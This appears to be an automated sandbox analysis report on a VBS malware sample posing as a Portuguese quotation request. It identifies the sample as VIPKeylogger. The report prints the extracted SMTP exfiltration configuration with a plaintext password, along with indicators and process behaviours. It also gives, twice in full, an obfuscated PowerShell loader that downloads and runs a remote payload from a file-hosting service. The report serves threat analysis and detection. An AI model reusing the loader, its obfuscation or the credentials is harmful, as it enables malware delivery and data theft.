Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 23-10-2024 14:46
Static task: static1
Behavioral task: behavioral1
Sample: Pedido de Cotação-24100004_lista comercial.vbs
Resource: win7-20240903-en
General
Target: Pedido de Cotação-24100004_lista comercial.vbs
Size: 523KB
MD5: 071b2e84cdf90885bce11e5713dab307
SHA1: ea48ea5b782669f05084a4a1e374ff64c8f581c0
SHA256: 400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
SHA512: a981122c9f3f2675f116c2b860e6f05016ab7be3a9cd9eee873af4f89ff7d93548cce9c020d79fa7bf191d04f664f127efadfdca5019b5ec2699498837d46664
SSDEEP: 6144:BA/7iXwe0h73QXqs1SQl3GZF+lfd0okbN9VusXmFtzbVHcje9wYYhnQgjDHgs91+:LKhgamowdhkFuW0tXwjQg/p1+FWg
Malware Config
Extracted: vipkeylogger
Protocol: smtp
Host: mail.recsb.com
Port: 587
Username: [email protected]
Password: 1=vI*r6^
Email To: [email protected]
Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
Blocklisted process makes network request (10 IoCs)
Processes:
flow  pid   process
5     2672  powershell.exe
7     2672  powershell.exe
9     1856  msiexec.exe
11    1856  msiexec.exe
13    1856  msiexec.exe
15    1856  msiexec.exe
16    1856  msiexec.exe
18    1856  msiexec.exe
20    1856  msiexec.exe
22    1856  msiexec.exe

Processes:
pid   process
2672  powershell.exe
2972  powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
17    checkip.dyndns.org

Processes:
pid   process
2672  powershell.exe
2972  powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes:
pid   process
1856  msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
pid   process
2972  powershell.exe
1856  msiexec.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description  ioc                                                          process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
pid   process
2672  powershell.exe
2972  powershell.exe
2972  powershell.exe
1856  msiexec.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
Processes:
pid   process
2972  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
description              pid   process
Token: SeDebugPrivilege  2672  powershell.exe
Token: SeDebugPrivilege  2972  powershell.exe
Token: SeDebugPrivilege  1856  msiexec.exe

Suspicious use of WriteProcessMemory (11 IoCs)
Processes:
description                        pid   process         target process
PID 2248 wrote to memory of 2672   2248  WScript.exe     powershell.exe
PID 2248 wrote to memory of 2672   2248  WScript.exe     powershell.exe
PID 2248 wrote to memory of 2672   2248  WScript.exe     powershell.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
PID 2972 wrote to memory of 1856   2972  powershell.exe  msiexec.exe
Processes

C:\Windows\System32\WScript.exe (depth 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
- Suspicious use of WriteProcessMemory
PID: 2248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 
'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il 
KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum 
itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 
'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il 
KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum 
itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2972

C:\Windows\SysWOW64\msiexec.exe (depth 2)
Command line: "C:\Windows\SysWOW64\msiexec.exe"
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1856

Network
MITRE ATT&CK Enterprise v15

Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp
Filesize: 7KB
MD5: 53eb1a2da1daa6ff5f0ececcca12b7ef
SHA1: 25998cd34dffa6cbdf55b227ab1a7fe728859e15
SHA256: 0366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa
SHA512: 46e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21

Filesize: 447KB
MD5: 4fa4bfe12534bd26a9e268a1e659e510
SHA1: f42014f4e7c0f11f4bb5f559c88310eb6db186a3
SHA256: 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
SHA512: 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01